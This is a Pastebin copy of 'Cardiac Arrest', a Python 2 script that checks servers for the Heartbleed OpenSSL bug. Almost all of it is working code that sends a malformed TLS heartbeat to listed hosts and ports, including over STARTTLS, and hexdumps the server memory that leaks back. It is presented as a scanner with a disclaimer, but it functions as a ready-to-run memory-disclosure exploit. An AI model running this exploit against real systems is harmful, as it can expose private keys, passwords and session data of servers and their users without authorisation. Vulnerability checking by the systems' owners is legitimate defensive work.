Advertisement
opexxx

cardiac-arrest.py

Apr 17th, 2014
230
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 19.58 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. # Hut3 Cardiac Arrest - A script to check OpenSSL servers for the Heartbleed bug (CVE-2014-0160).
  4. #
  5. # DISCLAIMER: There have been unconfirmed reports that this script can render HP iLO unresponsive.
  6. # This script complies with the TLS specification, so responsitivity issues are likely the result
  7. # of a bad implementation of TLS on the server side. CNS Hut3 and Adrian Hayter do not accept
  8. # responsibility if this script crashes a server you test it against. USE IT AT YOUR OWN RISK.
  9. # As always, the correct way to test for the vulnerability is to check the version of OpenSSL
  10. # installed on the server in question. OpenSSL 1.0.1 through 1.0.1f are vulnerable.
  11. #
  12. # This script has several advantages over similar scripts that have been released,
  13. # including a larger list of supported TLS cipher suites, support for multiple TLS
  14. # protocol versions (including SSLv3 since some configurations leak memory when
  15. # SSLv3 is used). Multiple ports / hosts can be tested at once, and limited
  16. # STARTTLS support is included.
  17. #
  18. #
  19. # Examples:
  20. #
  21. # Test all SSL/TLS protocols against 192.168.0.1 and 192.168.0.2 on ports 443 and 8443:
  22. #
  23. #    python heartattack.py -p 443,8443 192.168.0.1 192.168.0.2
  24. #
  25. # Test the TLSv1.2 protocol against 192.168.0.1 using SMTP STARTTLS on port 25:
  26. #
  27. #    python heartattack.py -s smtp -p 25 -V TLSv1.2 192.168.0.1
  28. #
  29. #
  30. # Several sections of code have been lifted from other detection scripts and
  31. # modified to make them more efficient. Sources include but are likely not limited to:
  32. #
  33. # https://bitbucket.org/johannestaas/heartattack (johannestaas@gmail.com)
  34. # https://gist.github.com/takeshixx/10107280 (takeshix@adversec.com)
  35. #
  36. # Like other authors of Heartbleed scripts, I disclaim copyright to this source code.
  37.  
  38. import sys
  39. import struct
  40. import socket
  41. import time
  42. import select
  43. import re
  44. import argparse
  45. import random
  46. import string
  47.  
  48. num_bytes_per_line = 16
  49. display_null_bytes = False
  50. verbose = False
  51.  
  52. starttls_options = ['none', 'smtp', 'pop3', 'imap', 'ftp']
  53. protocol_hex_to_name = {0x00:'SSLv3', 0x01:'TLSv1.0', 0x02:'TLSv1.1', 0x03:'TLSv1.2'}
  54. protocol_name_to_hex = dict(reversed(item) for item in protocol_hex_to_name.items())
  55.  
  56. alert_levels = {0x01:'warning', 0x02:'fatal'}
  57. alert_descriptions = {0x00:'Close notify', 0x0a:'Unexpected message', 0x14:'Bad record MAC', 0x15:'Decryption failed', 0x16:'Record overflow ', 0x1e:'Decompression failure', 0x28:'Handshake failure', 0x29:'No certificate', 0x2a:'Bad certificate', 0x2b:'Unsupported certificate', 0x2c:'Certificate revoked', 0x2d:'Certificate expired', 0x2e:'Certificate unknown', 0x2f:'Illegal parameter', 0x30:'Unknown CA', 0x31:'Access denied', 0x32:'Decode error', 0x33:'Decrypt error', 0x3c:'Export restriction', 0x46:'Protocol version', 0x47:'Insufficient security', 0x50:'Internal error', 0x5a:'User canceled', 0x64:'No renegotiation', 0x6e:'Unsupported extension', 0x6f:'Certificate unobtainable', 0x70:'Unrecognized name', 0x71:'Bad certificate status response', 0x72:'Bad certificate hash value', 0x73:'Unknown PSK identity'}
  58.  
  59. buffer_size = 1024
  60.  
  61. def rand(size=10, chars=string.letters + string.digits):
  62.     return ''.join(random.choice(chars) for _ in range(size))
  63.  
  64. def hexdump(s):
  65.     s = str(s)
  66.     for b in xrange(0, len(s), num_bytes_per_line):
  67.         lin = [c for c in s[b : b + num_bytes_per_line]]
  68.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
  69.         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
  70.         if pdat:
  71.             if display_null_bytes:
  72.                 print '  %04x: %-48s %s' % (b, hxdat, pdat)
  73.             elif not re.match('^\.{' + str(num_bytes_per_line) + '}$', pdat):
  74.                 print '  %04x: %-48s %s' % (b, hxdat, pdat)
  75.     sys.stdout.flush()
  76.  
  77. def hex2bin(arr):
  78.     return ''.join('{0:02x}'.format(x) for x in arr).decode('hex')
  79.  
  80. def gen_clienthello(v):
  81.     return hex2bin([0x16, 0x03, v, 0x02, 0xf2, 0x01, 0x00, 0x02, 0xee, 0x03, v, 0x53, 0x48, 0x73, 0xf0, 0x7c, 0xca, 0xc1, 0xd9, 0x02, 0x04, 0xf2, 0x1d, 0x2d, 0x49, 0xf5, 0x12, 0xbf, 0x40, 0x1b, 0x94, 0xd9, 0x93, 0xe4, 0xc4, 0xf4, 0xf0, 0xd0, 0x42, 0xcd, 0x44, 0xa2, 0x59,0x00, 0x02, 0x7c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x03, 0x00, 0x04, 0x00, 0x05, 0x00, 0x06, 0x00, 0x07, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x0b, 0x00, 0x0c, 0x00, 0x0d, 0x00, 0x0e, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11, 0x00, 0x12, 0x00, 0x13, 0x00, 0x14, 0x00, 0x15, 0x00, 0x16, 0x00, 0x17, 0x00, 0x18, 0x00, 0x19, 0x00, 0x1a, 0x00, 0x1b, 0x00, 0x1e, 0x00, 0x1f, 0x00, 0x20, 0x00, 0x21, 0x00, 0x22, 0x00, 0x23, 0x00, 0x24, 0x00, 0x25, 0x00, 0x26, 0x00, 0x27, 0x00, 0x28, 0x00, 0x29, 0x00, 0x2a, 0x00, 0x2b, 0x00, 0x2c, 0x00, 0x2d, 0x00, 0x2e, 0x00, 0x2f, 0x00, 0x30, 0x00, 0x31, 0x00, 0x32, 0x00, 0x33, 0x00, 0x34, 0x00, 0x35, 0x00, 0x36, 0x00, 0x37, 0x00, 0x38, 0x00, 0x39, 0x00, 0x3a, 0x00, 0x3b, 0x00, 0x3c, 0x00, 0x3d, 0x00, 0x3e, 0x00, 0x3f, 0x00, 0x40, 0x00, 0x41, 0x00, 0x42, 0x00, 0x43, 0x00, 0x44, 0x00, 0x45, 0x00, 0x46, 0x00, 0x67, 0x00, 0x68, 0x00, 0x69, 0x00, 0x6a, 0x00, 0x6b, 0x00, 0x6c, 0x00, 0x6d, 0x00, 0x84, 0x00, 0x85, 0x00, 0x86, 0x00, 0x87, 0x00, 0x88, 0x00, 0x89, 0x00, 0x8a, 0x00, 0x8b, 0x00, 0x8c, 0x00, 0x8d, 0x00, 0x8e, 0x00, 0x8f, 0x00, 0x90, 0x00, 0x91, 0x00, 0x92, 0x00, 0x93, 0x00, 0x94, 0x00, 0x95, 0x00, 0x96, 0x00, 0x97, 0x00, 0x98, 0x00, 0x99, 0x00, 0x9a, 0x00, 0x9b, 0x00, 0x9c, 0x00, 0x9d, 0x00, 0x9e, 0x00, 0x9f, 0x00, 0xa0, 0x00, 0xa1, 0x00, 0xa2, 0x00, 0xa3, 0x00, 0xa4, 0x00, 0xa5, 0x00, 0xa6, 0x00, 0xa7, 0x00, 0xa8, 0x00, 0xa9, 0x00, 0xaa, 0x00, 0xab, 0x00, 0xac, 0x00, 0xad, 0x00, 0xae, 0x00, 0xaf, 0x00, 0xb0, 0x00, 0xb1, 0x00, 0xb2, 0x00, 0xb3, 0x00, 0xb4, 0x00, 0xb5, 0x00, 0xb6, 0x00, 0xb7, 0x00, 0xb8, 0x00, 0xb9, 0x00, 0xba, 0x00, 0xbb, 0x00, 0xbc, 0x00, 0xbd, 0x00, 0xbe, 0x00, 0xbf, 0x00, 0xc0, 0x00, 0xc1, 0x00, 0xc2, 0x00, 0xc3, 0x00, 0xc4, 0x00, 0xc5, 0x00, 0xff, 0xc0, 0x01, 0xc0, 0x02, 0xc0, 0x03, 0xc0, 0x04, 0xc0, 0x05, 0xc0, 0x06, 0xc0, 0x07, 0xc0, 0x08, 0xc0, 0x09, 0xc0, 0x0a, 0xc0, 0x0b, 0xc0, 0x0c, 0xc0, 0x0d, 0xc0, 0x0e, 0xc0, 0x0f, 0xc0, 0x10, 0xc0, 0x11, 0xc0, 0x12, 0xc0, 0x13, 0xc0, 0x14, 0xc0, 0x15, 0xc0, 0x16, 0xc0, 0x17, 0xc0, 0x18, 0xc0, 0x19, 0xc0, 0x1a, 0xc0, 0x1b, 0xc0, 0x1c, 0xc0, 0x1d, 0xc0, 0x1e, 0xc0, 0x1f, 0xc0, 0x20, 0xc0, 0x21, 0xc0, 0x22, 0xc0, 0x23, 0xc0, 0x24, 0xc0, 0x25, 0xc0, 0x26, 0xc0, 0x27, 0xc0, 0x28, 0xc0, 0x29, 0xc0, 0x2a, 0xc0, 0x2b, 0xc0, 0x2c, 0xc0, 0x2d, 0xc0, 0x2e, 0xc0, 0x2f, 0xc0, 0x30, 0xc0, 0x31, 0xc0, 0x32, 0xc0, 0x33, 0xc0, 0x34, 0xc0, 0x35, 0xc0, 0x36, 0xc0, 0x37, 0xc0, 0x38, 0xc0, 0x39, 0xc0, 0x3a, 0xc0, 0x3b, 0xc0, 0x3c, 0xc0, 0x3d, 0xc0, 0x3e, 0xc0, 0x3f, 0xc0, 0x40, 0xc0, 0x41, 0xc0, 0x42, 0xc0, 0x43, 0xc0, 0x44, 0xc0, 0x45, 0xc0, 0x46, 0xc0, 0x47, 0xc0, 0x48, 0xc0, 0x49, 0xc0, 0x4a, 0xc0, 0x4b, 0xc0, 0x4c, 0xc0, 0x4d, 0xc0, 0x4e, 0xc0, 0x4f, 0xc0, 0x50, 0xc0, 0x51, 0xc0, 0x52, 0xc0, 0x53, 0xc0, 0x54, 0xc0, 0x55, 0xc0, 0x56, 0xc0, 0x57, 0xc0, 0x58, 0xc0, 0x59, 0xc0, 0x5a, 0xc0, 0x5b, 0xc0, 0x5c, 0xc0, 0x5d, 0xc0, 0x5e, 0xc0, 0x5f, 0xc0, 0x60, 0xc0, 0x61, 0xc0, 0x62, 0xc0, 0x63, 0xc0, 0x64, 0xc0, 0x65, 0xc0, 0x66, 0xc0, 0x67, 0xc0, 0x68, 0xc0, 0x69, 0xc0, 0x6a, 0xc0, 0x6b, 0xc0, 0x6c, 0xc0, 0x6d, 0xc0, 0x6e, 0xc0, 0x6f, 0xc0, 0x70, 0xc0, 0x71, 0xc0, 0x72, 0xc0, 0x73, 0xc0, 0x74, 0xc0, 0x75, 0xc0, 0x76, 0xc0, 0x77, 0xc0, 0x78, 0xc0, 0x79, 0xc0, 0x7a, 0xc0, 0x7b, 0xc0, 0x7c, 0xc0, 0x7d, 0xc0, 0x7e, 0xc0, 0x7f, 0xc0, 0x80, 0xc0, 0x81, 0xc0, 0x82, 0xc0, 0x83, 0xc0, 0x84, 0xc0, 0x85, 0xc0, 0x86, 0xc0, 0x87, 0xc0, 0x88, 0xc0, 0x89, 0xc0, 0x8a, 0xc0, 0x8b, 0xc0, 0x8c, 0xc0, 0x8d, 0xc0, 0x8e, 0xc0, 0x8f, 0xc0, 0x90, 0xc0, 0x91, 0xc0, 0x92, 0xc0, 0x93, 0xc0, 0x94, 0xc0, 0x95, 0xc0, 0x96, 0xc0, 0x97, 0xc0, 0x98, 0xc0, 0x99, 0xc0, 0x9a, 0xc0, 0x9b, 0xc0, 0x9c, 0xc0, 0x9d, 0xc0, 0x9e, 0xc0, 0x9f, 0xc0, 0xa0, 0xc0, 0xa1, 0xc0, 0xa2, 0xc0, 0xa3, 0xc0, 0xa4, 0xc0, 0xa5, 0xc0, 0xa6, 0xc0, 0xa7, 0xc0, 0xa8, 0xc0, 0xa9, 0xc0, 0xaa, 0xc0, 0xab, 0xc0, 0xac, 0xc0, 0xad, 0xc0, 0xae, 0xc0, 0xaf,0x01, 0x00, 0x00, 0x49, 0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,0x00, 0x23, 0x00, 0x00,0x00, 0x0f, 0x00, 0x01, 0x01])
  82.  
  83. def gen_heartbeat(v):
  84.     return hex2bin([0x18, 0x03, v, 0x00, 0x03, 0x01, 0xff, 0xff])
  85.  
  86. def recvall(s, length, timeout=5):
  87.     end = time.time() + timeout
  88.     rdata = ''
  89.     while length > 0:
  90.         ready = select.select([s], [], [], 1)
  91.         if ready[0]:
  92.             data = s.recv(length)
  93.             if not data:
  94.                 break
  95.             leng = len(data)
  96.             rdata += data
  97.             if time.time() > end:
  98.                 break
  99.             length -= leng
  100.         else:
  101.             if time.time() > end:
  102.                 break
  103.     return rdata
  104.  
  105. def recvmsg(s, timeout=5):
  106.     hdr = recvall(s, 5, timeout)
  107.     if hdr is None:
  108.         return None, None, None
  109.     elif len(hdr) == 5:
  110.         type, version, length = struct.unpack('>BHH', hdr)
  111.         payload = recvall(s, length, timeout)
  112.         if payload is None:
  113.             return type, version, None
  114.     else:
  115.         return None, None, None
  116.     return type, version, payload
  117.  
  118. def attack(ip, port, tlsversion, starttls='none', timeout=5):
  119.     tlslongver = protocol_hex_to_name[tlsversion]
  120.    
  121.     if starttls == 'none':
  122.         print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver
  123.     else:
  124.         print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver + ' with STARTTLS'
  125.     sys.stdout.flush()
  126.    
  127.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  128.     s.settimeout(timeout)
  129.    
  130.     try:
  131.         s.connect((ip, port))
  132.        
  133.         if starttls == 'smtp':
  134.             recvall(s, buffer_size)
  135.             s.send('ehlo ' + rand(10) + '\n')
  136.             res = recvall(s, buffer_size)
  137.             if not 'STARTTLS' in res:
  138.                 print >> sys.stderr, '\033[93m[ERROR] STARTTLS does not appear to be supported.\033[0m\n'
  139.                 sys.stderr.flush()
  140.                 return False
  141.             s.send('starttls\n')
  142.             recvall(s, buffer_size)
  143.         elif starttls == 'pop3':
  144.             recvall(s, buffer_size)
  145.             s.send("STLS\n")
  146.             recvall(s, buffer_size)
  147.         elif starttls == 'imap':
  148.             recvall(s, buffer_size)
  149.             s.send("STARTTLS\n")
  150.             recvall(s, buffer_size)
  151.         elif starttls == 'ftp':
  152.             recvall(s, buffer_size)
  153.             s.send("AUTH TLS\n")
  154.             recvall(s, buffer_size)
  155.        
  156.         s.send(gen_clienthello(tlsversion))
  157.        
  158.         while True:
  159.             type, version, payload = recvmsg(s, timeout)
  160.             if type is None:
  161.                 print >> sys.stderr, '\033[93m[ERROR] The server closed the connection without sending the ServerHello. This might mean the server does not support ' + tlslongver + ' or it might not support SSL/TLS at all.\033[0m\n'
  162.                 sys.stderr.flush()
  163.                 return False
  164.             elif type == 22 and ord(payload[0]) == 0x0E:
  165.                 break
  166.        
  167.         s.send(gen_heartbeat(tlsversion))
  168.        
  169.         while True:
  170.             type, version, payload = recvmsg(s, timeout)
  171.             if type is None:
  172.                 print '[INFO] No heartbeat response was received. The server is probably not vulnerable.\n'
  173.                 sys.stdout.flush()
  174.                 return False
  175.            
  176.             if type == 24:
  177.                 if len(payload) > 3:
  178.                     print '\033[91m\033[1m[FAIL] Heartbeat response was ' + str(len(payload)) + ' bytes instead of 3! ' + str(ip) + ':' + str(port) + ' is vulnerable over ' + tlslongver + '\033[0m'
  179.                     if display_null_bytes:
  180.                         print '[INFO] Displaying response:'
  181.                     else:
  182.                         print '[INFO] Displaying response (lines consisting entirely of null bytes are removed):'
  183.                     print ''
  184.                     sys.stdout.flush()
  185.                     hexdump(payload)
  186.                     print ''
  187.                     return True
  188.                 else:
  189.                     print '[INFO] The server processed the malformed heartbeat, but did not return any extra data.\n'
  190.                     sys.stdout.flush()
  191.                     return False
  192.            
  193.             if type == 21:
  194.                 print '[INFO] The server received an alert. It is likely not vulnerable.'
  195.                 if verbose: print '[INFO] Alert Level: ' + alert_levels[ord(payload[0])]
  196.                 if verbose: print '[INFO] Alert Description: ' + alert_descriptions[ord(payload[1])] + ' (see RFC 5246 section 7.2)'
  197.                 print ''
  198.                 sys.stdout.flush()
  199.                 return False
  200.        
  201.         hexdump(payload)
  202.        
  203.         socket.close()
  204.     except socket.error as e:
  205.         print >> sys.stderr, '\033[93m[ERROR] Connection error. The port might not be open on the host.\033[0m\n'
  206.         sys.stderr.flush()
  207.         return False
  208.  
  209. def main():
  210.     global bytes, display_null_bytes, verbose
  211.    
  212.     parser = argparse.ArgumentParser()
  213.     parser.add_argument('-p', '--ports', type=str, default='443', help='Comma separated list of ports to check (default: 443)')
  214.     parser.add_argument('-s', '--starttls', type=str, default='none', help='Use STARTTLS to upgrade the plaintext connection to SSL/TLS. Valid values: none, smtp, pop3, imap, ftp (default: none)')
  215.     parser.add_argument('-t', '--timeout', type=int, default=5, help='Connection timeout in seconds (default: 5)')
  216.     parser.add_argument('-b', '--bytes', type=int, default=16, help='Number of leaked bytes to display per line (default 16)')
  217.     parser.add_argument('-n', '--null-bytes', action='store_true', default=False, help='Display lines consisting entirely of null bytes (default: False)')
  218.     parser.add_argument('-a', '--all-versions', action='store_true', default=False, help='Continue testing all versions of SSL/TLS even if the server is found to be vulnerable (default: False)')
  219.     parser.add_argument('-V', '--version', type=str, default='all', help='Comma separated list of SSL/TLS versions to check. Valid values: SSLv3, TLSv1.0, TLSv1.1, TLSv1.2')
  220.     parser.add_argument('-v', '--verbose', action='store_true', default=False, help='Verbose output.')
  221.     parser.add_argument('hosts', metavar='host', nargs='+', help='A host to scan.')
  222.     args = parser.parse_args()
  223.    
  224.     args.starttls = args.starttls.lower()
  225.     if args.starttls not in starttls_options:
  226.         print >> sys.stderr, '\033[93m[ERROR] Invalid STARTTLS value. Valid values: none, smtp, pop3, imap, ftp.\033[0m\n'
  227.         parser.print_help()
  228.         sys.exit(1)
  229.    
  230.     bytes = args.bytes
  231.     display_null_bytes = args.null_bytes
  232.     verbose = args.verbose
  233.    
  234.     versions = []
  235.     for v in [x.strip() for x in args.version.split(',')]:
  236.         if v:
  237.             versions.append(v)
  238.    
  239.     if 'all' not in versions:
  240.         for v in versions:
  241.             if v not in protocol_name_to_hex:
  242.                 print >> sys.stderr, '\033[93m[ERROR] Invalid SSL/TLS version(s). Valid values: SSLv3, TLSv1.0, TLSv1.1, TLSv1.2.\033[0m\n'
  243.                 parser.print_help()
  244.                 sys.exit(1)
  245.    
  246.     ports = args.ports.split(',')
  247.     ports = list(map(int, ports))
  248.    
  249.     hosts = []
  250.    
  251.     for h in args.hosts:
  252.         for h2 in h.split(','):
  253.             h2 = h2.strip()
  254.             if h2:
  255.                 hosts.append(h2)
  256.    
  257.     for host in hosts:
  258.         try:
  259.             ip = socket.gethostbyname(host)
  260.         except socket.gaierror as e:
  261.             print '[INFO] Testing: ' + host
  262.             print >> sys.stderr, '\033[93m[ERROR] Could not resolve an IP address for the given host.\033[0m\n'
  263.             sys.stderr.flush()
  264.             continue
  265.        
  266.         if ip == host:
  267.             print '[INFO] Testing: ' + host + '\n'
  268.         else:
  269.             print '[INFO] Testing: ' + host + ' (' + str(ip) + ')\n'
  270.         sys.stdout.flush()
  271.        
  272.         for port in ports:
  273.             if 'all' in versions:
  274.                 if (args.all_versions):
  275.                     ssl30 = attack(ip, port, 0x00, starttls=args.starttls, timeout=args.timeout)
  276.                     tls10 = attack(ip, port, 0x01, starttls=args.starttls, timeout=args.timeout)
  277.                     tls11 = attack(ip, port, 0x02, starttls=args.starttls, timeout=args.timeout)
  278.                     tls12 = attack(ip, port, 0x03, starttls=args.starttls, timeout=args.timeout)
  279.                    
  280.                     if not ssl30 and not tls10 and not tls11 and not tls12:
  281.                         if ip == host:
  282.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
  283.                         else:
  284.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) +') does not appear to be vulnerable to Heartbleed!\033[0m\n'
  285.                         sys.stdout.flush()
  286.                 else:
  287.                     if not attack(ip, port, 0x00, starttls=args.starttls, timeout=args.timeout):
  288.                         if not attack(ip, port, 0x01, starttls=args.starttls, timeout=args.timeout):
  289.                             if not attack(ip, port, 0x02, starttls=args.starttls, timeout=args.timeout):
  290.                                 if not attack(ip, port, 0x03, starttls=args.starttls, timeout=args.timeout):
  291.                                     if ip == host:
  292.                                         print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
  293.                                     else:
  294.                                         print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) + ') does not appear to be vulnerable to Heartbleed!\033[0m\n'
  295.                                     sys.stdout.flush()
  296.             else:
  297.                 if (args.all_versions):
  298.                     vulnerable = []
  299.                     for v in versions:
  300.                         if attack(ip, port, protocol_name_to_hex[v], starttls=args.starttls, timeout=args.timeout):
  301.                             vulnerable.append(True)
  302.                     if True not in vulnerable:
  303.                         if ip == host:
  304.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
  305.                         else:
  306.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) + ') does not appear to be vulnerable to Heartbleed!\033[0m\n'
  307.                         sys.stdout.flush()
  308.                 else:
  309.                     vulnerable = True
  310.                     for v in versions:
  311.                         vulnerable = attack(ip, port, protocol_name_to_hex[v], starttls=args.starttls, timeout=args.timeout)
  312.                         if vulnerable:
  313.                             break
  314.                         else:
  315.                             continue
  316.                     if not vulnerable:
  317.                         if ip == host:
  318.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
  319.                         else:
  320.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) + ') does not appear to be vulnerable to Heartbleed!\033[0m\n'
  321.                         sys.stdout.flush()
  322.  
  323. if __name__ == '__main__':
  324.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement